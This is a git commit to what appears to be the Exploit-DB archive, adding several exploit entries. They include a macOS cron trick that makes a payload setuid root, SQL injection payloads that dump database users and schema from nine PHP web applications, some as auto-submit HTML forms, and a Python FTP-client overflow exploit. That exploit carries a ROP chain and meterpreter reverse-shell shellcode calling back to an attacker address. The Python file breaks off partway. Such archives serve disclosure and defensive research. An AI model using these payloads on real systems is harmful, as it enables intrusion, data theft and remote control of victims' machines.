From c35d9b35f710aab7b9569a1f3549711e3c5bc30f Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 9 Dec 2017 05:02:21 +0000
Subject: [PATCH] DB: 2017-12-09

14 changes to exploits/shellcodes

macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free
macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement
macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free
Apple macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement
Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement
macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption
macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free
macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free
Apple macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption
Apple macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free
Apple macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free
Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash
Linux Kernel - DCCP Socket Use-After-Free
Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free

iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free
Apple iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free

macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation

iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation
Apple iOS/macOS - 'xpc_data' Objects Sandbox Escape Privilege Escalation

macOS High Sierra - Local Privilege Escalation (Metasploit)
Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)
Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation
Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation

LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass)
DomainSale PHP Script 1.0 - 'id' SQL Injection
Simple Chatting System 1.0.0 - Arbitrary File Upload
Website Auction Marketplace 2.0.5 - 'cat_id' SQL Injection
Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection
FS Thumbtack Clone 1.0 - 'cat' / 'sc' SQL Injection
FS Stackoverflow Clone 1.0 - 'keywords' SQL Injection
FS Shutterstock Clone 1.0 - 'keywords' SQL Injection
FS Quibids Clone 1.0 - SQL Injection
FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection
FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection
---
 exploits/macos/local/43247.md    |  19 +++++
 exploits/macos/local/43248.md    |  16 +++++
 exploits/php/webapps/43102.txt   |   1 +
 exploits/php/webapps/43235.txt   |  29 ++++++++
 exploits/php/webapps/43237.txt   |  27 ++++++++
 exploits/php/webapps/43238.txt   |  29 ++++++++
 exploits/php/webapps/43239.txt   |  29 ++++++++
 exploits/php/webapps/43240.txt   |  37 ++++++++++
 exploits/php/webapps/43241.txt   |  30 ++++++++
 exploits/php/webapps/43242.txt   |  30 ++++++++
 exploits/php/webapps/43243.txt   |  30 ++++++++
 exploits/php/webapps/43244.txt   |  36 ++++++++++
 exploits/php/webapps/43245.txt   |  28 ++++++++
 exploits/windows/remote/43236.py | 115 +++++++++++++++++++++++++++++++
 files_exploits.csv               |  37 ++++++----
 15 files changed, 481 insertions(+), 12 deletions(-)
 create mode 100644 exploits/macos/local/43247.md
 create mode 100644 exploits/macos/local/43248.md
 create mode 100644 exploits/php/webapps/43235.txt
 create mode 100644 exploits/php/webapps/43237.txt
 create mode 100644 exploits/php/webapps/43238.txt
 create mode 100644 exploits/php/webapps/43239.txt
 create mode 100644 exploits/php/webapps/43240.txt
 create mode 100644 exploits/php/webapps/43241.txt
 create mode 100644 exploits/php/webapps/43242.txt
 create mode 100644 exploits/php/webapps/43243.txt
 create mode 100644 exploits/php/webapps/43244.txt
 create mode 100644 exploits/php/webapps/43245.txt
 create mode 100755 exploits/windows/remote/43236.py

diff --git a/exploits/macos/local/43247.md b/exploits/macos/local/43247.md
new file mode 100644
index 000000000..32663b68f
--- /dev/null
+++ b/exploits/macos/local/43247.md
@@ -0,0 +1,19 @@
+Recently I was working on an security issue in some other software that has yet to be disclosed which created a rather interesting condition. As a non-root user I was able to write to any file on the system that was not SIP-protected but the resulting file would not be root-owned, even if it previously was.
+
+This presented an interesting challenge for privilege escalation - how would you exploit this to obtain root access? The obvious first attempt was the sudoers file but sudo is smart enough not to process it if the file isn't root-owned so that didn't work.
+
+I then discovered (after a tip from a friend - thanks pndc!) that the cron system in macOS does not care who the crontab files are owned by. Getting root was a simple case of creating a crontab file at:
+
+```
+/var/at/tabs/root
+```
+
+with a 60-second cron line, eg:
+
+```
+* * * * * chown root:wheel /tmp/payload && chmod 4755 /tmp/payload
+```
+
+and then waiting for it to execute. It's not clear if this is a macOS-specific issue or a hangover from the BSD-inherited cron system, I suspect the latter.
+
+The issue has been reported to Apple so hopefully they will fix it.
\ No newline at end of file
diff --git a/exploits/macos/local/43248.md b/exploits/macos/local/43248.md
new file mode 100644
index 000000000..13de97f16
--- /dev/null
+++ b/exploits/macos/local/43248.md
@@ -0,0 +1,16 @@
+## Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235
+"Dear @AppleSupport, we noticed a *HUGE* security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware of it @Apple?"
+
+
+## Proof: https://twitter.com/patrickwardle/status/935608904377077761
+
+
+## Mitigation/Detection/Forensic: https://news.ycombinator.com/item?id=15800676
+- Can be mitigated by enabling the root user with a strong password
+- Can be detected with `osquery` using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;";`
+- You can see what time the root account was enabled using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" WHERE key = "accountPolicyData";` then base 64 decoding that into a file and then running `plutil -convert xml1` and looking at the `passwordLastSetTime` field.
+_Note: osquery needs to be running with `sudo` but if you have it deployed across a fleet of macs as a daemon then it will be running with `sudo` anyway._
+_Note: You can get the same info with plutil(1): `$ sudo plutil -p /private/var/db/dslocal/nodes/Default/users/root.plist`_
+
+
+## Security Advisory: https://support.apple.com/en-gb/HT208315
\ No newline at end of file
diff --git a/exploits/php/webapps/43102.txt b/exploits/php/webapps/43102.txt
index 4bc47379a..a32b63c50 100644
--- a/exploits/php/webapps/43102.txt
+++ b/exploits/php/webapps/43102.txt
@@ -21,6 +21,7 @@
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/my_profile.php
+# http://localhost/[PATH]/view/teacher_profile2.php
 # http://localhost/[PATH]/uploads/[FILE]
 # 
 # Etc..
diff --git a/exploits/php/webapps/43235.txt b/exploits/php/webapps/43235.txt
new file mode 100644
index 000000000..89e838517
--- /dev/null
+++ b/exploits/php/webapps/43235.txt
@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.codester.com/ChewiScripts
+# Software Link: https://www.codester.com/items/5301/domainsale-php-script
+# Demo: http://chewiscripts.x10host.com/domain/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/domain.php?id=[SQL]
+# 
+# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
+# 
+# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43237.txt b/exploits/php/webapps/43237.txt
new file mode 100644
index 000000000..6a5e23123
--- /dev/null
+++ b/exploits/php/webapps/43237.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Simple Chatting System 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: http://yourphpscript.com/
+# Software Link: http://yourphpscript.com/index.php/product/simple-chatting-system-php-ajax-mysql-javascript/
+# Demo: http://chat.yourphpscript.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker upload arbitrary file....
+# 
+# Proof of Concept: 
+# 
+# Users profile picture arbitrary file can be uploaded ..
+# 
+# http://localhost/[PATH]/view/my_profile.php
+# http://localhost/[PATH]/uploads/[DATE].php
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43238.txt b/exploits/php/webapps/43238.txt
new file mode 100644
index 000000000..50d88b39e
--- /dev/null
+++ b/exploits/php/webapps/43238.txt
@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://flippa-clone.com/
+# Software Link: https://flippa-clone.com/
+# Demo: https://demo.flippa-clone.com/
+# Version: 2.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/search.php?cat_id=[SQL]
+# 
+# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
+# 
+# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43239.txt b/exploits/php/webapps/43239.txt
new file mode 100644
index 000000000..7da6e61ea
--- /dev/null
+++ b/exploits/php/webapps/43239.txt
@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/
+# Demo: http://thavasu.com/demo/crowdfunding/
+# Version: 2.7.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/single-cause.php?pid=[SQL]
+# 
+# -23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+-
+# 
+# http://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- 
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43240.txt b/exploits/php/webapps/43240.txt
new file mode 100644
index 000000000..51a1c75e0
--- /dev/null
+++ b/exploits/php/webapps/43240.txt
@@ -0,0 +1,37 @@
+# # # # # 
+# Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/thumbtack-clone/
+# Demo: http://thumbtack-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/browse-category.php?cat=[SQL]
+# 
+# -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
+# 
+# http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
+# 
+# 
+# 2)
+# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
+# 
+# -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
+# 
+# http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43241.txt b/exploits/php/webapps/43241.txt
new file mode 100644
index 000000000..b21f559bb
--- /dev/null
+++ b/exploits/php/webapps/43241.txt
@@ -0,0 +1,30 @@
+<!--
+# # # # # 
+# Exploit Title: FS Stackoverflow Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/stackoverflow-clone/
+# Demo: http://stackoverflow-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+-->
+<html>
+<body>
+<form method="post" action="http://server/question/">
+<input id="keywords" name="keywords" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x494853414e2053454e43414e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="text">
+<button type="submit" style="">Ver Ayari</button>
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/43242.txt b/exploits/php/webapps/43242.txt
new file mode 100644
index 000000000..540a0bfe9
--- /dev/null
+++ b/exploits/php/webapps/43242.txt
@@ -0,0 +1,30 @@
+<!--
+# # # # # 
+# Exploit Title: FS Shutterstock Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/shutterstock-clone/
+# Demo: http://shutterstock-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+-->
+<html>
+<body>
+<form method="post" action="http://server/Category/">
+<input name="keywords" id="keywords" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x494853414e2053454e43414e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="text">
+<button type="submit">Ver Ayari</button>
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/43243.txt b/exploits/php/webapps/43243.txt
new file mode 100644
index 000000000..46f044887
--- /dev/null
+++ b/exploits/php/webapps/43243.txt
@@ -0,0 +1,30 @@
+# # # # # 
+# Exploit Title: FS Quibids Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/quibids-clone/
+# Demo: http://quibids-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/itechd.php?productid=[SQL]
+# 
+# Parameter: productid (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: productid=609 AND 2165=2165
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43244.txt b/exploits/php/webapps/43244.txt
new file mode 100644
index 000000000..eaca1106d
--- /dev/null
+++ b/exploits/php/webapps/43244.txt
@@ -0,0 +1,36 @@
+# # # # # 
+# Exploit Title: FS Olx Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/olx-clone/
+# Demo: http://olx-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/subpage.php?scat=[SQL]
+# 
+# 51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+-
+# 
+# http://server/subpage.php?scat=51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+-
+# 
+# 2)
+# http://localhost/[PATH]/message.php?pid=[SQL]
+# 
+# -1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+# 
+# view-source:http://server/message.php?pid=-1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43245.txt b/exploits/php/webapps/43245.txt
new file mode 100644
index 000000000..7f06f657c
--- /dev/null
+++ b/exploits/php/webapps/43245.txt
@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: FS Monster Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/monster-clone/
+# Demo: http://monster-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/Employer_Details.php?id=[SQL]
+# 
+# -3'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32))--+-
+# 
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/remote/43236.py b/exploits/windows/remote/43236.py
new file mode 100755
index 000000000..a6664e2dc
--- /dev/null
+++ b/exploits/windows/remote/43236.py
@@ -0,0 +1,115 @@
+#!/usr/bin/env python
+#
+# Exploit Title     : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
+# Date              : 12/8/2017
+# Exploit Author    : wetw0rk
+# Vendor Homepage   : http://www.labf.com/nfsaxe/nfs-server.html
+# Software link     : http://www.labf.com/download/nfsaxe.exe 
+# Version           : 3.7
+# Tested on         : Windows 7 (x86)
+# Description       : Upon connection the victim is sent a specially crafted buffer
+#                     overwriting the SEH record, resulting in code execution. 
+#
+# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly)
+#
+# Trigger the vulnerability by :
+#   Login as -> [check] anonymous -> connect
+#
+
+import struct, socket
+
+host = "0.0.0.0"
+port = 21
+
+# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp
+# -f python -b "\x00\x0a\x10" -v shellcode --smallest
+shellcode =  ""
+shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1"
+shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05"
+shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43"
+shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c"
+shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28"
+shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe"
+shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40"
+shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b"
+shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf"
+shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41"
+shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa"
+shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24"
+shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4"
+shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd"
+shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88"
+shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7"
+shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f"
+shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a"
+shellcode += "\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5"
+shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31"
+shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf"
+shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5"
+shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52"
+shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f"
+shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda"
+
+def create_rop_chain():
+    # https://www.corelan.be/index.php/security/corelan-ropdb/
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+    	0x7c37653d, 	# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+	    0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
+	    0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
+	    0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
+	    0xffffffff,	# 
+	    0x7c376402,	# skip 4 bytes [msvcr71.dll]
+	    0x7c351e05,	# NEG EAX # RETN [msvcr71.dll] 
+	    0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll] 
+	    0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
+	    0x7c344f87,	# POP EDX # RETN [msvcr71.dll] 
+	    0xffffffc0,	# Value to negate, will become 0x00000040
+	    0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll] 
+	    0x7c34d201,	# POP ECX # RETN [msvcr71.dll] 
+	    0x7c38b001,	# &Writable location [msvcr71.dll]
+	    0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
+	    0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+	    0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
+	    0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+rop_chain += "\x90" * 20
+rop_chain += shellcode
+off2ROP = "B" * 212                 # offset to the start of our ROP chain
+off2nSEH = "A" * (9391- (           # offset the nSEH and adjustments
+    len(off2ROP) + len(rop_chain)   # account for shellcode and offset
+    )
+)
+nSEH = "BBBB"                        # SEH will be the start of the stack pivot
+SEH = struct.pack('<L', 0x68034468)  # ADD ESP,61C # POP # POP # POP # POP # POP # RETN [WCMDPA10.dll]
+trigger = "C" * (10000 - (           # fill buffer to trigger vulnerability
+    9399                             # offset + nSEH + SEH
+    )
+)
+
+buffer  = off2ROP + rop_chain + off2nSEH + nSEH + SEH + trigger
+payload = "220 %s is current directory\r\n" % (buffer)
+
+try:
